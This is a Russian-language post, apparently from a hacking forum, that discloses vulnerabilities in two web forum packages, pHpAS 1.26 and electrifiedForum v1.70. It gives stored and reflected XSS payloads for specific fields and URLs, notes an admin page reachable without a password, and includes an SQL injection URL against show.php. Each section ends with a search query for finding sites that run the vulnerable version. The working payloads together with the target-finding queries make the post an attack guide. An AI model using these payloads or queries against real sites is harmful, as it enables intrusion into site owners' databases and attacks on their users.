Форум: pHpAS
Версия: 1.26
1. Активная XSS.
1) При ответе в теме в поля
Title и
Name вставляем скрипт
<script>alert();</script>.
Скрипт будет выполняться при про смотре коментариев.
2) При создание темы (/admin - пароль здесь не нужен) в полях
Title и
Text вводим
<script>alert();</script>.
Скрипт будет выполнятся как на странице admin/index.php так и на /index.php.
2. SQL инъекция.
Уязвимость в сценарие
show.php в параемтре
id.
Код:
http://site.ru/forum/show.php?id=-1+union+select+1,2,3,4/*
Не смотря на то, что на форуме нет пользователей, сама sql инъекция даёт возможность обращаться к другим таблицам (к примеру к таблицам, используемым движком сайта).
------------------------------------------------------------
Для поиска сайтов с таким форумом вводим: Powered By: pHpAS 1.26
------------------------------------------------------------
------------------------------------------------------------
Форум: electrifiedForum
Версия: v1.70
1. Пасивная XSS.
Код:
http://site.ru/forum/index.php?action=displaythread&forum=chat&id=<script>alert();</script>
Есть еще одна но, она будет выполняться только с админскими привилегиями:
Код:
http://site.ru/forum/index.php?action=userinfo&user=<script>alert();</script>
2. Активная XSS.
1) В личке в поле
Subject пишем
<script>alert();</script>, скрипт будет выполняться при просмотре личной почты.
2) В профиле в подписе (
Signature) пишем
<script>alert();</script>, скрипт будет выполняться при просмотре сообщений на форуме.
3) На форуме при создание темы в поле
Title пишем
<script>alert();</script>, скрипт будет выполняться при ответе на сообщение.
------------------------------------------------------------
Для поиска сайтов с таким форумом вводим: Powered By electrifiedForum v1.70